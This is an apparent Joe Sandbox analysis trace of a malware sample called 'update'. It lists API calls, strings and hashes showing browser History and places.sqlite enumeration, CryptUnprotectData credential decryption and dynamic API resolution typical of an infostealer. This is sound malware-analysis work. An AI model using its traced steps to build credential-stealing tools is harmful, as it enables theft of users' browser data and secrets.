                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: NameUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2645101109-0
                                                                                                            • Opcode ID: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
                                                                                                            • Instruction ID: 7803372b71e91cd4900786e151d6695f3fca8b78fda9d7e8201226f5ab6c0eae
                                                                                                            • Opcode Fuzzy Hash: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
                                                                                                            • Instruction Fuzzy Hash: D7E08CB16043065BD3109AA8D880AAA76E89B88300F00493AB89AD73D0FE39CE248647
                                                                                                            APIs
                                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403BBB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocString
                                                                                                            • String ID:
                                                                                                            • API String ID: 2525500382-0
                                                                                                            • Opcode ID: 0100b19e5ea0ce085f6791d6055cf17ebcb7f85dc8371484061749cb1acedcd1
                                                                                                            • Instruction ID: cc320876a9625d104608ea07d28c2a31881d354d5da6284e066d4471a5eebec8
                                                                                                            • Opcode Fuzzy Hash: 0100b19e5ea0ce085f6791d6055cf17ebcb7f85dc8371484061749cb1acedcd1
                                                                                                            • Instruction Fuzzy Hash: 9AB0922425860120EA6418620A01B33185C0B60B4BF880037AD20F41C2D96DE901503A
                                                                                                            APIs
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00403BD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeString
                                                                                                            • String ID:
                                                                                                            • API String ID: 3341692771-0
                                                                                                            • Opcode ID: 4922c5fd9d3a0b2b3f5f47c82899ed0dbd9246eb6c6f0e0d0d4e4ac0480ba6a2
                                                                                                            • Instruction ID: b74080e8723bd2c965acb067c4bb7b075115b3c8c25a1433ae70b86ac4b73cdf
                                                                                                            • Opcode Fuzzy Hash: 4922c5fd9d3a0b2b3f5f47c82899ed0dbd9246eb6c6f0e0d0d4e4ac0480ba6a2
                                                                                                            • Instruction Fuzzy Hash: 0BA0247C10030354CF0F351F000041331353FD03073C4C47D51003D1515D3F54004114
                                                                                                            APIs
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: b291eff7d8b065b47bfa4970d5e5377ccb2b015cdc94aedb823a1819aa810e09
                                                                                                            • Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
                                                                                                            • Opcode Fuzzy Hash: b291eff7d8b065b47bfa4970d5e5377ccb2b015cdc94aedb823a1819aa810e09
                                                                                                            • Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,0041A232), ref: 00414115
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$FileFindFirst
                                                                                                            • String ID: .LNK$._.$8?A$T_@
                                                                                                            • API String ID: 1653790112-814392791
                                                                                                            • Opcode ID: 1d8af5ad470fc4bede735bce2fb3fa085eec8a0803dd75236fea097156046d72
                                                                                                            • Instruction ID: ccf2d574420f699031c81d78e58b697f7985245bee10ad08c344e755ebce9b4b
                                                                                                            • Opcode Fuzzy Hash: 1d8af5ad470fc4bede735bce2fb3fa085eec8a0803dd75236fea097156046d72
                                                                                                            • Instruction Fuzzy Hash: C2223F74A0011E9BDB10EF55C985ADEB7B9EF84308F1081B7E504B7291DB38AF868F59
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FD4,?,00000000,?,00000000,?,00413361,00000000,00000000,00413B6D,?,00000000,00000024), ref: 00412E0B
                                                                                                              • Part of subcall function 0040776C: GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
                                                                                                            • FindNextFileW.KERNEL32(?,?,0041C91C,00412FFC,?,00412FFC,0041A232,00000000,?,00000000,00412FD4,?,00000000,?,00000000), ref: 00412F5D
                                                                                                            • FindClose.KERNEL32(?,?,?,0041C91C,00412FFC,?,00412FFC,0041A232,00000000,?,00000000,00412FD4,?,00000000,?,00000000), ref: 00412F6E
                                                                                                              • Part of subcall function 00412974: GetTickCount.KERNEL32 ref: 004129B8
                                                                                                              • Part of subcall function 00412974: 6BD67450.KERNEL32(00000000,00000000,000000FF,?,00412C78,?,.tmp,?,?,00000000,00412BB7,?,00000000,00412C41,?,00000000), ref: 00412A34
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$AllocAttributesCloseCountD67450FirstNextStringTick
                                                                                                            • String ID: .txt$\*.*$\History
                                                                                                            • API String ID: 3882801140-2232271174
                                                                                                            • Opcode ID: d5d256c756bc9a0ca0ba1b22b5d48c2297ca2773f1b472ef4f445c44d961df31
                                                                                                            • Instruction ID: b8b382f9890bf67c4ce716ca2eff32e8703a5b333aba7ace94e6d5da5dd104b6
                                                                                                            • Opcode Fuzzy Hash: d5d256c756bc9a0ca0ba1b22b5d48c2297ca2773f1b472ef4f445c44d961df31
                                                                                                            • Instruction Fuzzy Hash: 14514C749042199BCF50EF61CD89ACDBBB8FB48304F5041FAA108B3291DB789F959F14
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0041328E,?,00000000,?,00000000,?,00413A53,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004130CF
                                                                                                              • Part of subcall function 0040776C: GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
                                                                                                            • FindNextFileW.KERNEL32(?,?,0041C80C,004132B8,?,004132B8,0041A232,00000000,?,00000000,0041328E,?,00000000,?,00000000), ref: 00413217
                                                                                                            • FindClose.KERNEL32(?,?,?,0041C80C,004132B8,?,004132B8,0041A232,00000000,?,00000000,0041328E,?,00000000,?,00000000), ref: 00413228
                                                                                                              • Part of subcall function 0041253C: GetTickCount.KERNEL32 ref: 00412580
                                                                                                              • Part of subcall function 0041253C: 6BD67450.KERNEL32(00000000,00000000,000000FF,?,00412840,?,.tmp,?,?,00000000,0041277F,?,00000000,00412809,?,00000000), ref: 004125FC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$AllocAttributesCloseCountD67450FirstNextStringTick
                                                                                                            • String ID: .txt$\*.*$\places.sqlite
                                                                                                            • API String ID: 3882801140-3919338718
                                                                                                            • Opcode ID: ec560269c81936adf07f7ff3aaaf6b143af8a4e6812d11f13f8f76c8d5feb3d0
                                                                                                            • Instruction ID: db2ad4c0925ffecf13339862ae006cc807f871b19183d5a4da560477eb916681
                                                                                                            • Opcode Fuzzy Hash: ec560269c81936adf07f7ff3aaaf6b143af8a4e6812d11f13f8f76c8d5feb3d0
                                                                                                            • Instruction Fuzzy Hash: 50512E749042199FCF50EF62CC89ACDBBB9EB48305F5041FAA508B3251DB399F858F18
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0041195E,?,00000000,?,00000000,00000053,00000000,00000000,00000000,?,00411CBE,00000000,00000000), ref: 00411678
                                                                                                              • Part of subcall function 004112D0: GetTickCount.KERNEL32 ref: 00411315
                                                                                                              • Part of subcall function 004112D0: 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                                                                                                            • FindNextFileW.KERNEL32(?,?,0041C91C,00411988,?,00411988,0041A232,00000000,?,00000000,0041195E,?,00000000,?,00000000,00000053), ref: 004118B1
                                                                                                            • FindClose.KERNEL32(?,?,?,0041C91C,00411988,?,00411988,0041A232,00000000,?,00000000,0041195E,?,00000000,?,00000000), ref: 004118C2
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseCountD67450FirstFreeNextStringTick
                                                                                                            • String ID: .txt$\*.*
                                                                                                            • API String ID: 182094936-2615687548
                                                                                                            • Opcode ID: 42ad6f2f07dfb6a25be9780b71739f636c23f16ae05a15835c9cb2f7ef558c53
                                                                                                            • Instruction ID: 5d1a81ccab342788691620b24a62b0bf455cea36908fa984f2d283373c0e855c
                                                                                                            • Opcode Fuzzy Hash: 42ad6f2f07dfb6a25be9780b71739f636c23f16ae05a15835c9cb2f7ef558c53
                                                                                                            • Instruction Fuzzy Hash: 40813C7490011DAFCF11EB51CC56BDDB779EF44304F6081EAA218B62A1DB399F858F58
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00411C11,?,00000000,?,00000000,?,004123C4,00000000,00000000,004123CE,?,00000000,00000000), ref: 00411A4B
                                                                                                              • Part of subcall function 0040776C: GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
                                                                                                            • FindNextFileW.KERNEL32(?,?,0041C80C,00411C38,?,00411C38,0041A232,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411B9A
                                                                                                            • FindClose.KERNEL32(?,?,?,0041C80C,00411C38,?,00411C38,0041A232,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411BAB
                                                                                                              • Part of subcall function 00410D88: GetTickCount.KERNEL32 ref: 00410DCC
                                                                                                              • Part of subcall function 00410D88: 6BD67450.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$AllocAttributesCloseCountD67450FirstNextStringTick
                                                                                                            • String ID: .txt$\*.*
                                                                                                            • API String ID: 3882801140-2615687548
                                                                                                            • Opcode ID: 1e7d7e85e0fc797bc53a84780c3fe4d989827ee1ff23332d6361331b0a78df9a
                                                                                                            • Instruction ID: bf64687dc2ad86eb18c2fbcd59d677e1e6eaf9ec35dfa69074ee7f3f85d2a588
                                                                                                            • Opcode Fuzzy Hash: 1e7d7e85e0fc797bc53a84780c3fe4d989827ee1ff23332d6361331b0a78df9a
                                                                                                            • Instruction Fuzzy Hash: 25514B749052199FCF61EF61CD85ACDBBB8EB48304F5081FAA508B32A1DB389F858F54
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00411C11,?,00000000,?,00000000,?,004123C4,00000000,00000000,004123CE,?,00000000,00000000), ref: 00411A4B
                                                                                                              • Part of subcall function 0040776C: GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
                                                                                                            • FindNextFileW.KERNEL32(?,?,0041C80C,00411C38,?,00411C38,0041A232,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411B9A
                                                                                                            • FindClose.KERNEL32(?,?,?,0041C80C,00411C38,?,00411C38,0041A232,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411BAB
                                                                                                              • Part of subcall function 00410D88: GetTickCount.KERNEL32 ref: 00410DCC
                                                                                                              • Part of subcall function 00410D88: 6BD67450.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$AllocAttributesCloseCountD67450FirstNextStringTick
                                                                                                            • String ID: .txt$\*.*
                                                                                                            • API String ID: 3882801140-2615687548
                                                                                                            • Opcode ID: 9ed39196901e4c4264153a5eda5fee9cbbdfd45b17cdb1ef7785d40ff299e03a
                                                                                                            • Instruction ID: 460237bab6dc973d40a851033a2d7f34c10cc3b5c211c467e1e524dd2a58d6ff
                                                                                                            • Opcode Fuzzy Hash: 9ed39196901e4c4264153a5eda5fee9cbbdfd45b17cdb1ef7785d40ff299e03a
                                                                                                            • Instruction Fuzzy Hash: E9511C749052199FCF61EF61CD89ACDBBB9EB48304F5081FAA508B3261DB389F858F54
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A631
                                                                                                            • LocalFree.KERNEL32(?), ref: 0040A656
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataFreeLocalUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 1561624719-0
                                                                                                            • Opcode ID: 4cb84ba265810d0427a3151a5d59ee8d30dfb7262f640eff190e35c4dcdf75f3
                                                                                                            • Instruction ID: 789b43464e992449ae21f91847352ccfea11bbcfb58c617e1741a13a3b8d6e83
                                                                                                            • Opcode Fuzzy Hash: 4cb84ba265810d0427a3151a5d59ee8d30dfb7262f640eff190e35c4dcdf75f3
                                                                                                            • Instruction Fuzzy Hash: 85F0BEB1344300ABD310EE69CC82B4BB7E8AB84700F14893E7698EB2D1D639E955875A
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(0041B0DC,00000000,00000005,0040B24C,00000000,?,00000000,0040B2AD,0041A232), ref: 0040B23C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID:
                                                                                                            • API String ID: 542301482-0
                                                                                                            • Opcode ID: ea87c094835d07a58bc1d5365071f3338e958cacf1eec016397e9f1b13d5280c
                                                                                                            • Instruction ID: 69e00c9d87702f46269832269a6170cc29c97575f005fbbd27e421e5aa9de9af
                                                                                                            • Opcode Fuzzy Hash: ea87c094835d07a58bc1d5365071f3338e958cacf1eec016397e9f1b13d5280c
                                                                                                            • Instruction Fuzzy Hash: 64C0029538166026E12471AA1C9AF5F458CCB89B59F2504BBB614FA2D7A6A85C0002ED
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00418731), ref: 00405679
                                                                                                            • GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 00405688
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040569A
                                                                                                            • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 004056AC
                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 004056BE
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 004056D0
                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 004056E2
                                                                                                            • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056F4
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 00405706
                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 00405718
                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 0040572A
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040573C
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 0040574E
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405760
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405772
                                                                                                            • GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 00405784
                                                                                                            • GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 00405796
                                                                                                            • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 004057A8
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 004057BA
                                                                                                            • GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 004057CC
                                                                                                            • GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057DE
                                                                                                            • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057F0
                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00405802
                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00405814
                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00405826
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 00405838
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040584A
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 0040585C
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 0040586E
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405880
                                                                                                            • GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405892
                                                                                                            • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 004058A4
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 004058B6
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 004058C8
                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058DA
                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058E9
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058F8
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 0040590A
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 0040591C
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0040592E
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405940
                                                                                                            • GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405952
                                                                                                            • GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 00405964
                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 00405976
                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00405988
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 0040599A
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 004059AC
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 004059BE
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004059D0
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059E2
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059F4
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 00405A06
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 00405A18
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00405A2A
                                                                                                            • LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 00405A39
                                                                                                            • GetProcAddress.KERNEL32(75BD0000,EnumDisplayDevicesW), ref: 00405A4E
                                                                                                            • GetProcAddress.KERNEL32(75BD0000,wvsprintfA), ref: 00405A63
                                                                                                            • GetProcAddress.KERNEL32(75BD0000,GetKeyboardLayoutList), ref: 00405A78
                                                                                                            • LoadLibraryA.KERNEL32(shell32.dll,75BD0000,GetKeyboardLayoutList,75BD0000,wvsprintfA,75BD0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A87
                                                                                                            • GetProcAddress.KERNEL32(75DA0000,ShellExecuteExW), ref: 00405A9C
                                                                                                            • LoadLibraryA.KERNEL32(ntdll.dll,75DA0000,ShellExecuteExW,shell32.dll,75BD0000,GetKeyboardLayoutList,75BD0000,wvsprintfA,75BD0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405AAB
                                                                                                            • GetProcAddress.KERNEL32(76E90000,RtlComputeCrc32), ref: 00405AC0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                            • String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
                                                                                                            • API String ID: 2238633743-3531362093
                                                                                                            • Opcode ID: dde84a1b0545234da602e85d90304d20f92d552cdb0d366e7dc8fbeb5297048c
                                                                                                            • Instruction ID: b4e9e9acb65dceb8197331e62ecd6ac44c6462922570a5848b60e957845f71d1
                                                                                                            • Opcode Fuzzy Hash: dde84a1b0545234da602e85d90304d20f92d552cdb0d366e7dc8fbeb5297048c
                                                                                                            • Instruction Fuzzy Hash: 6EB15BB1A90710AFD700BFA5DC86A6A37A8FB4A704351593BB550FF2E5D6789C008F9C
